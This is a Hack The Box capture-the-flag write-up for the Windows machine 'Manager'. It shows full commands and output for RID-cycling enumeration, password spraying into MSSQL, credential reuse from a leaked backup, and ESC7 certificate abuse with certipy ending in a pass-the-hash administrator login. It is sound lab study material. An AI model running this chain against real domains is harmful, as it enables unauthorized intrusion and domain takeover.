HTB - Manager

Description

Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The xp_dirtree procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.

Enumeration

---

Nmap Scan

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports-scan

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s
5985/tcp  open  wsman
49693/tcp open  unknown
49782/tcp open  unknown

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p53,80,88,135,139,389,445,1433,5985 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-03 01:37:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-01T19:35:12
|_Not valid after:  2054-11-01T19:35:12
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m01s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

Summary

* Open ports: 53,80,88,135,139,389,445,1433,5985
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - RPC - SMB - MSSQL -winRM
* Important notes: Domain: manager.htb - DNS:dc01.manager.htb

hosts file

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $sudo sh -c "echo  '$ip dc01 dc01.manager.htb manager.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $tail -n1 /etc/hosts
10.10.11.236 dc01 dc01.manager.htb manager.htb

Service Enumeration

HTTP Enumeration

http://manager.htb/manager.htb

I don't get anything new from fuzzing files and directories from those I find in the website

No many things are in this web app as it seems to be a static website, So I will switch to other services running on this box

SMB & RPC Enumeration

I don't get anything useful permissions on the shares, but I get the users on the domain using rid bruting

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $nxc smb dc01 -u 'guest' -p '' --shares

SMB         10.10.11.236    445    DC01             [+] manager.htb\guest: 
SMB         10.10.11.236    445    DC01             [*] Enumerated shares
SMB         10.10.11.236    445    DC01             Share           Permissions     Remark
SMB         10.10.11.236    445    DC01             -----           -----------     ------
SMB         10.10.11.236    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.236    445    DC01             C$                              Default share
SMB         10.10.11.236    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.236    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.11.236    445    DC01             SYSVOL                          Logon server share 

Foothold

---

Since I don't have any password yet, I will try to brute the password as the user's name and I get a hit

I can brute MSSQL login, too

With valid credentials, I will look at the shared access and MSSQL database. When I looked at the share, I didn't get interesting things here so will move to mssql

And I'm in the database :))

When I deal with mssql, I perform checklist for possible attack paths, So I will create one

• Check for admin Access

• Check the databases for juicy info and secrets

• Check the possibility capture the mssql service account

• Check for impersonating other users

• Check for trustworthy database

• Check for Linked Server

• Check for Read or Write Access to the file system

• Check for executing commands with xp_cmdshell

With this List, I can move forward and I will use mssqlclient.py built-in commands

SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
-----------   
          0 

SQL (MANAGER\Operator  guest@master)> enum_db
name     is_trustworthy_on   
------   -----------------   
master                   0   
tempdb                   0   
model                    0   
msdb                     1   

SQL (MANAGER\Operator  guest@master)> enum_owner
Database   Owner   
--------   -----   
master     sa      
tempdb     sa      
model      sa      
msdb       sa

SQL (MANAGER\Operator  guest@master)> enum_links
SRV_NAME          SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE    SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
---------------   ----------------   -----------   ---------------   ------------------   ------------   -------   
DC01\SQLEXPRESS   SQLNCLI            SQL Server    DC01\SQLEXPRESS   NULL                 NULL           NULL

SQL (MANAGER\Operator  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor   
----------   --------   ---------------   ----------   -------   ------- 

Till now, I don't get any possible path and when I even tried to get the hash of the service account, I got the hash of the machine account which is uncrackable

The last thing I can try is check read or write access to the file system. I will use xp_dirtree to list the directories in a path.

Lateral Movement

---

With IIS web server running on the box, I can try to read web.config or an important file on its directory inetpub. Here are several interesting files web.config & website-backup-27-07-23-old.zip

When I tried to access the web.config trough web, it gave me file not found.

but when I tried to access the .zip file, It was downloaded

I created a new directory, moved the zip file to it, unzipped it and list the content. there is an odd .xml file

It contain credential for raven user.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $cat .old-conf.xml

..snip..
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
..snip..

These credentials are valid and I have access to Winrm, too :))

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $evil-winrm -i dc01 -u raven -p 'R4v3nBe5tD3veloP3r!123'

*Evil-WinRM* PS C:\Users\Raven\Documents> type ..\Desktop\user.txt
518fbc8e81299098bac6e8654ae731a1

User Flag: 518fbc8e81299098bac6xxxxxxxxxxxxx

Privilege Escalation

---

Looking at the account privs and groups, I noticed that he is a member of Certificate Service DCOM Access which means PKI existence

I can confirm with NetExec using ADCS module

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $nxc ldap dc01 -u raven -p 'R4v3nBe5tD3veloP3r!123' -M adcs

LDAP        10.10.11.236    389    DC01             [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 
ADCS        10.10.11.236    389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.236    389    DC01             Found PKI Enrollment Server: dc01.manager.htb
ADCS        10.10.11.236    389    DC01             Found CN: manager-DC01-CA

When dealing with ADCS, I hurry to enumerate possible ESCALATION (ESC) paths using certipy

Then, I will also use certipy to find vunerable templates or permissions

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                : 'MANAGER.HTB\\Raven' has dangerous permissions

• user raven has Enroll and ManageCA rights which means he can enroll new certificate and edit permission on any template, So I can make it vulnerable to ESC4

• The built-in SubCA template is also enabled (as it is by default). This template is vulnerable to ESC1 but only permits Domain Admins and Enterprise Admins to enroll.

• The certificate is present and enabled (Enabled: True). If the SubCA certificate is disabled we should enable it.

• Since we have ManageCA rights, we can assign ManageCertificate rights to any account.

Exploitation Path

1. Enable SubCA template

2. Grant ManageCertificate rights

3. Request certificate for SubCA template impersonating administrator

4. Approve the enrollment request as raven

5. Access the machine as an administrator

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -enable-template 'SubCA'

Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

Grant ManageCertificate rights

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -add-officer raven

Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

Confirm the new permission

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -stdout -dc-ip 10.10.11.236

..snip..
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven

• With the SubCA template enabled and with ManageCertificates rights, we can request a certificate by adding an alternative SAN and selecting the SubCA template.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -template SubCA -upn Administrator

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 20
Would you like to save the private key? (y/N) y
[*] Saved private key to 20.key
[-] Failed to request certificate

• We need to save the requested ID 20, and respond yes to the question: Would you like to save the private key? (y/N). We will need this private key to retrieve the certificate later.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -issue-request 20

Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -retrieve 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saved certificate and private key to 'administrator.pfx'

Now I can authenticate as an administrator with the .pfx file

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy auth -pfx administrator.pfx -domain manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

Access the machine

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $evil-winrm -i dc01 -u administrator -H ae5064c2f62317332c88629e025924ef

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
5fa4f9480b1bba44627e3fcfaf5a08a5

Root Flag: 5fa4f9480b1bba44627exxxxxxxxxxxxxxxx